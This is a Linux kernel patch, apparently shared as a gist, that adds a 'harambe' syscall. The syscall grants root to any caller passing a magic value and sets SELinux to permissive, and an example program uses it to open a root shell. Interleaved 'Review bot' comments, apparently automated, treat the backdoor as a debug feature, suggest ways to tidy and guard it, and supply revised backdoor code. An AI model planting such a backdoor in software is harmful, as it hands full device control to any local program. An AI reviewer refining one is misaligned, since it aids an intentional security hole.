Created
November 12, 2016 04:43
From 57beb8c9d0e68d30e02eadf705eaa1c6e6e7a8bb Mon Sep 17 00:00:00 2001 | |
From: Zhuowei Zhang <_@_> | |
Date: Sat, 24 Sep 2016 11:17:20 -0700 | |
Subject: [PATCH] kernel: add harambe backdoor syscall | |
This patch adds a new syscall for elevating any program to root and for | |
switching SELinux to permissive mode. There are no security checks, | |
so this should never be used in production. | |
Example program: | |
int main() { | |
syscall(278, 0x33ff22dd); // become root | |
syscall(278, 0x33ff22de); // selinux permissive | |
execl("/system/bin/sh", "/system/bin/sh", (char*)0); | |
return 0; | |
} | |
--- | |
include/linux/syscalls.h | 1 + | |
include/uapi/asm-generic/unistd.h | 4 +++- | |
kernel/sys.c | 23 +++++++++++++++++++++++ | |
3 files changed, 27 insertions(+), 1 deletion(-) | |
diff --git a/include/linux/syscalls.h b/include/linux/syscalls.h | |
index 55b8b74..5aacea5 100644 | |
--- a/include/linux/syscalls.h | |
+++ b/include/linux/syscalls.h | |
@@ -873,3 +873,4 @@ asmlinkage long sys_finit_module(int fd, const char __user *uargs, int flags); | |
asmlinkage long sys_seccomp(unsigned int op, unsigned int flags, | |
const char __user *uargs); | |
#endif | |
+asmlinkage long sys_harambe(int cmd); | |
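Review bot: The new prototype on the last line of this hunk is added after the `#endif`, which looks like the closing line of the header's include guard; that is inferred from the hunk sitting at the end of the file. Declarations belong inside the guard next to `sys_seccomp`, so `asmlinkage long sys_harambe(int cmd);` should move above the `#endif`. It also has no comment marking it as an out-of-tree debug entry point; a one-line `/* debug-only, never ship: see kernel/sys.c */` above it would tell anyone auditing the header what they are looking at.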
diff --git a/include/uapi/asm-generic/unistd.h b/include/uapi/asm-generic/unistd.h | |
index 2464ed5..7786bd6 100644 | |
--- a/include/uapi/asm-generic/unistd.h | |
+++ b/include/uapi/asm-generic/unistd.h | |
@@ -702,9 +702,11 @@ __SYSCALL(__NR_sched_getattr, sys_sched_getattr) | |
__SYSCALL(__NR_renameat2, sys_ni_syscall) | |
#define __NR_seccomp 277 | |
__SYSCALL(__NR_seccomp, sys_seccomp) | |
+#define __NR_harambe 278 | |
+__SYSCALL(__NR_harambe, sys_harambe) | |
#undef __NR_syscalls | |
-#define __NR_syscalls 278 | |
+#define __NR_syscalls 279 | |
/* | |
* All syscalls below here should go away really, | |
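Review bot: The added `#define __NR_harambe 278` takes the next free slot in the shared asm-generic table, and mainline assigns that number to `getrandom`. The tree will therefore conflict once that syscall is backported, and a binary built against upstream headers that issues syscall 278 would land in this handler instead. A private debug syscall is safer at a number well away from the upstream range, with a comment such as `/* out-of-tree debug syscall, not an upstream ABI number */` above the define. Because this is a uapi header, the number is also exported to every architecture that uses the generic table, not only the device this was written for.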
diff --git a/kernel/sys.c b/kernel/sys.c | |
index 0b08c9f..5a49bf7 100644 | |
--- a/kernel/sys.c | |
+++ b/kernel/sys.c | |
@@ -2661,3 +2661,26 @@ COMPAT_SYSCALL_DEFINE1(sysinfo, struct compat_sysinfo __user *, info) | |
return 0; | |
} | |
#endif /* CONFIG_COMPAT */ | |
+ | |
+/* | |
+ * Backdoor syscall for setting root and/or disabling SELinux. | |
+ */ | |
+extern int selinux_enforcing; | |
+extern void selnl_notify_setenforce(int val); | |
+extern void selinux_status_update_setenforce(int enforcing); | |
+SYSCALL_DEFINE1(harambe, int, cmd) | |
+{ | |
+ if (cmd == 0x33ff22dd) { | |
+ // get root | |
+ commit_creds(prepare_kernel_cred(0)); | |
+ return 0; | |
+ } else if (cmd == 0x33ff22de) { | |
+ // disable SELinux | |
+ selinux_enforcing = 0; | |
+ selnl_notify_setenforce(selinux_enforcing); | |
+ selinux_status_update_setenforce(selinux_enforcing); | |
+ return 0; | |
+ } else { | |
+ return -1; | |
+ } | |
+} | |
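Review bot: Nothing in this hunk keeps `sys_harambe` out of a production image, because the definition is compiled unconditionally; the commit message's "never be used in production" holds only as long as the patch is never merged into a release branch. Wrapping the block in a debug-only Kconfig option that defaults to off lets release configs be audited for it, and the table entry in unistd.h and the prototype in syscalls.h would need the same guard. Separately, `prepare_kernel_cred(0)` can return NULL on allocation failure and is passed straight to `commit_creds()`, and the final `return -1` reaches userspace as EPERM where `-EINVAL` would describe an unknown `cmd`. The `extern int selinux_enforcing` declaration presumably links only when SELinux is built with its development option, so the guard should depend on that as well (to be confirmed against this tree).

```c
#ifdef CONFIG_PLACEHOLDER_DEBUG_BACKDOOR /* placeholder option name; default n, must not appear in release configs */
/* … unchanged: header comment and extern declarations … */
SYSCALL_DEFINE1(harambe, int, cmd)
{
	if (cmd == 0x33ff22dd) {
		struct cred *new = prepare_kernel_cred(0);

		if (!new)
			return -ENOMEM;
		commit_creds(new);
		return 0;
	}
	/* … unchanged: SELinux permissive branch … */
	return -EINVAL;
}
#endif /* CONFIG_PLACEHOLDER_DEBUG_BACKDOOR */
```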
-- | |
2.5.0 |